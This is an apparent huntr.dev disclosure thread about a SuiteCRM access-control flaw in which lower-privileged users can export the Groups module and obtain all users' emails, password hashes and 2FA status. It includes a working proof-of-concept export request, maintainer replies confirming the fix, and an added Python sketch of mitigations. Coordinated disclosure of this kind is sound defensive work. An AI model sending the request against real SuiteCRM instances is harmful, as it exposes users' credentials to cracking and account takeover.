Insufficient access control in the export functionality for the 'Groups' module exposing user password hashes in salesagility/suitecrm

Valid

Reported on

Aug 16th 2023


Description

The web application incorrectly returns sensitive data to authenticated lower-privileged users when they request an export of data from the 'Groups' module. The exported data includes each user's email address, password hash and whether two-factor authentication is configured.

Proof of Concept

To export sensitive information for all users on the application, the following request could be sent (version 8.3):

POST /legacy/index.php?entryPoint=export HTTP/1.1
Host: [APPLICATION_HOSTNAME]
Cookie: EmailGridWidths=0=10&1=10&2=150&3=250&4=175&5=125; ck_login_language_20=en_us; sugar_user_theme=suite8; sugar_user_theme=SuiteP; ck_login_id_20=2ed13b79-8c22-0f61-9511-64d0d6214ce7; ck_login_language_20=en_us; LEGACYSESSID=o67um0uqlvvbq090cq47ed84vi; PHPSESSID=ec351p8sg0sf51as5grrvc66kn; XSRF-TOKEN=8IkPTqHry3UFRIx_Sk47HIS2hnLvwvVr5jp_UVm79To; ck_login_id_20=f0950665-7c37-520f-9b61-64d2066e623e
Content-Length: 26
Cache-Control: max-age=0
Sec-Ch-Ua: 
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
Origin: [APPLICATION_HOSTNAME]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

module=Groups&action=index

The attack can be exploited on versions 7.12.9 and 7.13.4 by sending the request to /index.php?entryPoint=export instead.

The native intention of this functionality appears to be allowing users to export data from tables based on the module page they're viewing. The testing team enumerated all of the modules present in the application and began sending a series of requests to export data whilst changing the value of the module parameter to each module previously identified. From our testing, it appears only the Groups module returns overly permissive data.

Impact

An authenticated attacker could leverage this vulnerability to obtain users' password hashes and perform offline password cracking in an attempt to recover users' passwords. If successful, they could use a recovered password to log into the application as that user, if two-factor authentication is not configured. Additionally, if the password is reused in other applications, it could be possible to perform a credential stuffing attack.

Finally, if an administrator account password is broken and the account does not use two-factor authentication, it would be possible to authenticate to the application with the highest permission level, from where it may be possible to perform additional attacks.

Occurrences

It appears no validation is performed to ensure the user is authorised to view the data returned from the export query. Given the sensitive nature of the information returned by this request, the export should be limited to administrators, or the sensitive fields should be withheld if the user lacks the required permissions.

Note: This vulnerability is also present in public/legacy/modules/Groups/Groups.php for version 8.3; however, this could not be added as a new occurrence as it appears the code is not present on GitHub for this revision.
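The two mitigations suggested above (an admin-only gate, or redaction of the sensitive columns for everyone else), modelled as an added example; this is not SuiteCRM's code or its fix, and the column names, role flag and sample rows are constructed assumptions standing in for whatever the real Groups export emitted.

```python
"""Added example: the reported export behaviour beside two hardened variants.
Not SuiteCRM code; field names, the is_admin flag and the rows are assumptions."""

# Columns the report says were leaked: email, password hash, 2FA status.
# Constructed stand-in names, not SuiteCRM's actual column names.
SENSITIVE_COLUMNS = {"email1", "user_hash", "two_factor_enabled"}

# Modules whose export must be restricted to administrators (assumption: Groups only).
ADMIN_ONLY_EXPORT = {"Groups"}

# Constructed sample rows with fake values; shaped like a user table export.
SAMPLE_ROWS = [
    {"id": "1", "user_name": "admin", "email1": "admin@example.test",
     "user_hash": "$2y$10$FAKEHASHFAKEHASHFAKEHASHFAKEHASHFAKEHAS", "two_factor_enabled": "1"},
    {"id": "2", "user_name": "jsmith", "email1": "jsmith@example.test",
     "user_hash": "$2y$10$FAKEHASHFAKEHASHFAKEHASHFAKEHASHFAKEHAS", "two_factor_enabled": "0"},
]
LOW_PRIV_USER = {"user_name": "jsmith", "is_admin": False}  # constructed requester
ADMIN_USER = {"user_name": "admin", "is_admin": True}        # constructed requester


class ExportDenied(PermissionError):
    """Raised when a non-admin requests an admin-only export."""


def export_unchecked(module, rows, requester):
    """The reported behaviour: rows go out regardless of who asks."""
    return [dict(r) for r in rows]


def export_gated(module, rows, requester):
    """Mitigation 1: refuse the whole export of restricted modules to non-admins."""
    if module in ADMIN_ONLY_EXPORT and not requester.get("is_admin", False):
        raise ExportDenied(f"export of {module} requires an administrator")
    return [dict(r) for r in rows]


def export_redacted(module, rows, requester):
    """Mitigation 2: serve the export but strip sensitive columns for non-admins."""
    if requester.get("is_admin", False):
        return [dict(r) for r in rows]
    return [{k: v for k, v in r.items() if k not in SENSITIVE_COLUMNS} for r in rows]


def leaked_columns(rows):
    """Sensitive column names present anywhere in an export result (a quick audit check)."""
    return {k for r in rows for k in r if k in SENSITIVE_COLUMNS}


if __name__ == "__main__":
    print("unchecked leaks:", sorted(leaked_columns(export_unchecked("Groups", SAMPLE_ROWS, LOW_PRIV_USER))))
    print("redacted leaks:", sorted(leaked_columns(export_redacted("Groups", SAMPLE_ROWS, LOW_PRIV_USER))))
```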

salesagility/suitecrm maintainer
6 months ago

Maintainer


Hi illume-security,

Thank you for your Security Report.

We have raised the issue from this report with our internal security team to be confirmed.

Below is a reference of the issue raised and ID allocated:

SCRMBT-#242 - HuntrDev: Insufficient access control in the export functionality for the 'Groups' module exposing user password hashes in salesagility/suitecrm

We will review the issue and confirm whether or not it is a vulnerability within SuiteCRM and meets our criteria for a Security issue. If an issue is not considered a Security issue or does not need to be private, then we'll raise it via the GitHub bug tracker or a more appropriate place.

Thank you for your contribution to the SuiteCRM project.

Kind regards, SuiteCRM Security Team

illume-security
5 months ago

Researcher


Thank you - do you have an update regarding this vulnerability?

salesagility/suitecrm maintainer validated this vulnerability 5 months ago

Hi @illume-security,

Thank you for getting back to us.

The Security Team has assessed the following issue: SCRMBT-#242 - HuntrDev: Insufficient access control in the export functionality for the 'Groups' module exposing user password hashes in salesagility/suitecrm

This issue has been given a severity grading of 'Important'.

We have worked on a fix for the issue and it is scheduled to go on the next maintenance release, which is due very soon.

Once the fix is released, we aim to include your name in the release notes, giving credit for finding and reporting this issue. Please let us know if you would prefer not to be included or have a specific request on how you would like to be referenced within the release notes.

Once the issue is resolved on huntr.dev a CVE is emitted which we will add to the release notes.

Thank you for your assistance and contribution to the SuiteCRM product!

Kind regards, SuiteCRM Security Team

illume-security has been awarded the disclosure bounty
illume-security
5 months ago

Researcher


Hello team,

Thank you for the prompt update! I am happy to hear that a fix has been completed, and I look forward to the release.

Regarding credit for the vulnerability, we're a security company (illume Security) that identified this vulnerability as part of Web Application Penetration for a client and then performed additional testing after the test was completed to confirm any additional versions it may have affected. If possible, can the vulnerability be attributed to the 2 testers from illume Security? These are Josh Lees & Robert Stokes.

If required, we are happy to review the changes after the release and attempt to identify if the vulnerability is still present and if any additions could be made to our requests to trigger similar issues.

Kind regards,

salesagility/suitecrm maintainer marked this as fixed in 7.14.1 with commit c43eaa 5 months ago
This vulnerability has now been published 5 months ago
Group.php#L72-L88 has been validated
salesagility/suitecrm maintainer gave praise 5 months ago
Hi @illume-security,

Thank you for getting in touch regarding the following security report:

- SCRMBT-#242 - HuntrDev: Insufficient access control in the export functionality for the 'Groups' module exposing user password hashes in salesagility/suitecrm

The fix for this issue was introduced in versions 7.12.13, 7.14.1, 8.4.1 respectively. The release notes for each of these releases have been updated to reflect this.

The CVE has been assigned by huntr.dev; you can find it in the details of this report.

Thank you for your assistance and contribution to the SuiteCRM product!

Kind regards, SuiteCRM Security Team
illume-security
4 months ago

Researcher


Hello Team, thank you for the update. From a review of the CVE description, it says it only affects the version prior to 7.14.1. However, as detailed in our description and your confirmation in a release in version 8.4.1, this vulnerability also affected version 8.3. Can the CVE description please be updated to reflect this, as users on version 8.3 may choose not to upgrade as they would not believe they're affected?

Also, just to confirm, where are we able to see the attribution on the CVE to Josh Lees & Robert Stokes?
